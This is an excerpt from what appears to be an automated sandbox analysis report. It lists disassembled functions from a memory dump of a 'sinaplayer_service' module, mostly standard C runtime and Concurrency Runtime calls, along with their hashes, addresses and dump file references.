                                                                                                                                                                                                    • Instruction ID: 89152dcf2ced025993b1285faa794820541cc26b8d43fde3d59e20469e31c6b4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6205bd884e2f2c9398675e8af2c85c5044fc283ce3ba5cc6396f99fdc022120
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB717FF1D442299EFB208B54CC40BEDB7F8AB84308F5050EAE708AB141E7759BC59F68
                                                                                                                                                                                                    Function 6D0A8F92 Relevance: 6.2, APIs: 4, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: d81fa952071bb7eea505d799915084b5543237b7fd98f7b417266864623ed8db
                                                                                                                                                                                                    • Instruction ID: 314950b3ce5f98ea5a58913c7916615c811b99c42eab0009b98b79282454b67d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d81fa952071bb7eea505d799915084b5543237b7fd98f7b417266864623ed8db
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 76512AB6A5430E8FEB44CE1CD89479D33F2FB46314FA5822BE910CB281D3B5E9118B90
                                                                                                                                                                                                    Function 6D0EE943 Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::GetHistory.LIBCMT ref: 6D0EE97B
                                                                                                                                                                                                    • Concurrency::details::HillClimbing::FlushHistories.LIBCMT ref: 6D0EE990
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Climbing::Concurrency::details::Hill$FlushHistoriesHistory
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2521976074-0
                                                                                                                                                                                                    • Opcode ID: 43cdbfb551b4512b9a60d19bfacad2fc48f39b9bf319a088c50dbc564a996bb2
                                                                                                                                                                                                    • Instruction ID: adf50a5dc06fc580608907183fd6662919c3ceea019db2393c725468770e7e6d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43cdbfb551b4512b9a60d19bfacad2fc48f39b9bf319a088c50dbc564a996bb2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D551C270A04A0AEFDB099F24D0807E9F7FAFF49380F158659C89993255DF31A560CBD1
                                                                                                                                                                                                    Function 6D0EAB18 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6D0E9F50,?,?,?,?,00000000,00000000), ref: 6D0EAB46
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000,?,00000000,00000000,?,?,?,6D0E9F50,?,?,?,?,00000000,00000000), ref: 6D0EAB66
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0EAC8A
                                                                                                                                                                                                    • free.MSVCR120(?), ref: 6D0EAC93
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    • Opcode ID: 18214f1ebb69e61ce8dd15747d9ea3c5218b36c8b23233d7e3175f5c03915d63
                                                                                                                                                                                                    • Instruction ID: ecb53959c14f722e6de035e5fbe4bd9acc6abeefad67eb3cbd72ea5d2368ac2c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 18214f1ebb69e61ce8dd15747d9ea3c5218b36c8b23233d7e3175f5c03915d63
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 645139B5A04A0AAFDB04CF69C481AA9F7F1FF48314F24826ED81997741D735E961CF90
                                                                                                                                                                                                    Function 6D0A1928 Relevance: 6.2, APIs: 4, Instructions: 150COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _CRT_RTC_INITW.MSVCR120(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0A15A6
                                                                                                                                                                                                    • free.MSVCR120(00006A69), ref: 6D0A1A0D
                                                                                                                                                                                                    • free.MSVCR120(?,00006A69), ref: 6D0A1A4A
                                                                                                                                                                                                    • free.MSVCR120(?,?,00006A69), ref: 6D0A1A55
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF99E
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF9B7
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF9D0
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF9D9
                                                                                                                                                                                                    • free.MSVCR120(?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6D0DF9EB
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: free
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1294909896-0
                                                                                                                                                                                                    • Opcode ID: b8d2094d9414943216563375d5cd92b930092c5a16a3dffa84d36599bba4a353
                                                                                                                                                                                                    • Instruction ID: d23a74232c6a9ce9b570ce2fa5600663ebb55f8dc6e8c5c98d5a14fdbcd311aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8d2094d9414943216563375d5cd92b930092c5a16a3dffa84d36599bba4a353
                                                                                                                                                                                                    • Instruction Fuzzy Hash: FD4149316582869FEB028F78D8817E57FF4EF57325B1C42EAD495DA027D6318842CB52
                                                                                                                                                                                                    Function 6D0F0245 Relevance: 6.1, APIs: 4, Instructions: 149memoryCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::AdjustAllocationIncrease.LIBCMT ref: 6D0F0296
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::AddCore.LIBCMT ref: 6D0F0372
                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCMT ref: 6D0F0388
                                                                                                                                                                                                    • Concurrency::details::ResourceManager::SendResourceNotifications.LIBCMT ref: 6D0F03C7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Concurrency::details::$Proxy::Scheduler$Resource$AdjustAllocationBorrowedCoreIncreaseManager::NotificationsSendStateToggle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 772867930-0
                                                                                                                                                                                                    • Opcode ID: de3868945a6524268160681985767abd92d420b5dde3f85a6753c6faea0fef0f
                                                                                                                                                                                                    • Instruction ID: f1cb751367605d12faba7b381f1e72b1401088b3453b307059d9caec998c3910
                                                                                                                                                                                                    • Opcode Fuzzy Hash: de3868945a6524268160681985767abd92d420b5dde3f85a6753c6faea0fef0f
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47518B75E0821ADFDB15CF99C490BAEBBF6BF89314F25405DC846A7341C731A942CBA0
                                                                                                                                                                                                    Function 6D0E98FE Relevance: 6.1, APIs: 4, Instructions: 134COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3702945584-0
                                                                                                                                                                                                    • Opcode ID: ec8090c9f45b2dfe9fa0f7f5550e1db0235acb843716e8d043a3f298008b6455
                                                                                                                                                                                                    • Instruction ID: 325b1e5ec54b8ad852de007cc645a9dcf1d9f44955274b8b545c5b9b70ec8788
                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec8090c9f45b2dfe9fa0f7f5550e1db0235acb843716e8d043a3f298008b6455
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A431F2706086029BFF11CE2AA5C0BBE63D5AF82269B318529DD72976A1C720F887C751
                                                                                                                                                                                                    Function 6D0A3B15 Relevance: 6.1, APIs: 4, Instructions: 132COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 94262dd74edc80c97018a71458ed4918a6e90a4189257a76bc30c67d3cfc84a0
                                                                                                                                                                                                    • Instruction ID: b0b53722dffe545285d5d1bce65e5383af3972303b1eb46a5eb52cebf3507f45
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 94262dd74edc80c97018a71458ed4918a6e90a4189257a76bc30c67d3cfc84a0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8941A6712083028FE725CF29C980B17B7E1BF89325F54466EE6568B6D1D730E945CB92
                                                                                                                                                                                                    Function 6D0A65EE Relevance: 6.1, APIs: 4, Instructions: 131COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: aadbb5bfedd7f15821d5643dda10b260edcc284b2a70cdb102f0477fa0197533
                                                                                                                                                                                                    • Instruction ID: 652a118c67e83f98a8d17615c4a237a858b661d40081efc99abfa191818f0658
                                                                                                                                                                                                    • Opcode Fuzzy Hash: aadbb5bfedd7f15821d5643dda10b260edcc284b2a70cdb102f0477fa0197533
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D41E270A04706DFEB29CF68C981B6AB3F1FF49320F54826ED2169B281D731E941CB91
                                                                                                                                                                                                    Function 6D0EA760 Relevance: 6.1, APIs: 4, Instructions: 130COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??_U@YAPAXI@Z.MSVCR120(00000000), ref: 6D0EA811
                                                                                                                                                                                                    • memset.MSVCR120(00000000,00000000,00000000,00000000), ref: 6D0EA826
                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCR120(0000000C,00000000,00000000,00000000,00000000), ref: 6D0EA82D
                                                                                                                                                                                                    • ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR120 ref: 6D0EA8A3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@memset
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3776030036-0
                                                                                                                                                                                                    • Opcode ID: 53df2e3abb0c90eaa42c37cf78143c7b1719617a6dadb96ce027491df5f2a69c
                                                                                                                                                                                                    • Instruction ID: 42f59af6a22de987ca95e85c27a06f013f5573305aa0cfb5813cd58880238753
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 53df2e3abb0c90eaa42c37cf78143c7b1719617a6dadb96ce027491df5f2a69c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD4183716083128FE719CF28C980B17B7F1FF89365F60866DE5968B290D730E846CB92
                                                                                                                                                                                                    Function 6D0AA069 Relevance: 6.1, APIs: 4, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • __isctype_l.LIBCMT(00000000,00000001,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004), ref: 6D0D7097
                                                                                                                                                                                                    • _isleadbyte_l.MSVCR120(?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,00000000,00000000,00000004,00000000), ref: 6D0D70D8
                                                                                                                                                                                                    • __crtLCMapStringA.MSVCR120(00000000,?,00000100,00000004,00000001,00000000,00000003,?,00000001,00000001,00000000,00000000,00000000,00000000,00000000,00000001), ref: 6D0D7128
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: String__crt__isctype_l_getptd_isleadbyte_l
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4137432777-0
                                                                                                                                                                                                    • Opcode ID: fab5e595c3bcd69590cecc153e18bd09cef618834cf9b2e290d69a79d7d2e43a
                                                                                                                                                                                                    • Instruction ID: 3d77be538676efb8fd48ce3dc00eac97f324c9fb7d014623c32a84fd14f44010
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fab5e595c3bcd69590cecc153e18bd09cef618834cf9b2e290d69a79d7d2e43a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C241D530D1835AAFEB02CBA8C851FBD7BB4AB42315F148299E1619F2D2D7368645CB51
                                                                                                                                                                                                    Function 6D0F7EB9 Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 6D0F7EC0
                                                                                                                                                                                                    • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCMT ref: 6D0F7F15
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F7F50
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F7F98
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000048,?), ref: 6D0F7FCC
                                                                                                                                                                                                      • Part of subcall function 6D094872: TlsGetValue.KERNEL32(?,6D0948CA,?,?,?,?,?,?,?,6D094938,000000FF), ref: 6D09488E
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E7484,6D15CEB0), ref: 6D0F7FE1
                                                                                                                                                                                                      • Part of subcall function 6D0992EB: RaiseException.KERNEL32(?,?,?,6D0AC7FC,?,?,?,?,?,6D0DDA6A,?,6D0AC7FC,?,00000001), ref: 6D099333
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(?,?,?,?,?,?,?,6D0E7484,6D15CEB0), ref: 6D0F8006
                                                                                                                                                                                                    • ?_Abort@_StructuredTaskCollection@details@Concurrency@@AAEXXZ.MSVCR120(00000048,?,6D15D0DC), ref: 6D0F8061
                                                                                                                                                                                                    • Concurrency::details::ContextBase::IsCancellationVisible.LIBCMT ref: 6D0F8081
                                                                                                                                                                                                    • ??0exception@std@@QAE@XZ.MSVCR120(00000000,?,00000048,?,6D15D0DC), ref: 6D0F8091
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ??0exception@std@@Base::CancellationConcurrency::details::ContextVisible$ExceptionTask$Abort@_Base::_CollectionCollection@details@Concurrency::details::_Concurrency@@H_prolog3_catchRaiseStateStructuredThrowTokenValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4223231496-0
                                                                                                                                                                                                    • Opcode ID: 42a55fd103f951a44263766c4264d0250db15269c63932d4029096c247c5cca3
                                                                                                                                                                                                    • Instruction ID: 64367a768949be279725eaf484da06a02ef0b9d78b36ed313b7ee73f1fb2ce67
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42a55fd103f951a44263766c4264d0250db15269c63932d4029096c247c5cca3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8416F70A046069FEB14CF6AC590BAEB7F4FF48314B20842DE95AA7711C734E906CF91
                                                                                                                                                                                                    Function 6D09EF00 Relevance: 6.1, APIs: 4, Instructions: 100COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 6D08F764: _getptd.MSVCR120(00000001,00000000,?,6D0AE01F,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D08F77A
                                                                                                                                                                                                    • _isleadbyte_l.MSVCR120(?,?), ref: 6D09EF4B
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,6D0D5D30,00000001,00000000,00000000), ref: 6D09EF73
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,6D0D5D30,00000001,00000000,00000000), ref: 6D0D6F4D
                                                                                                                                                                                                    • _errno.MSVCR120 ref: 6D0D6F6D
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
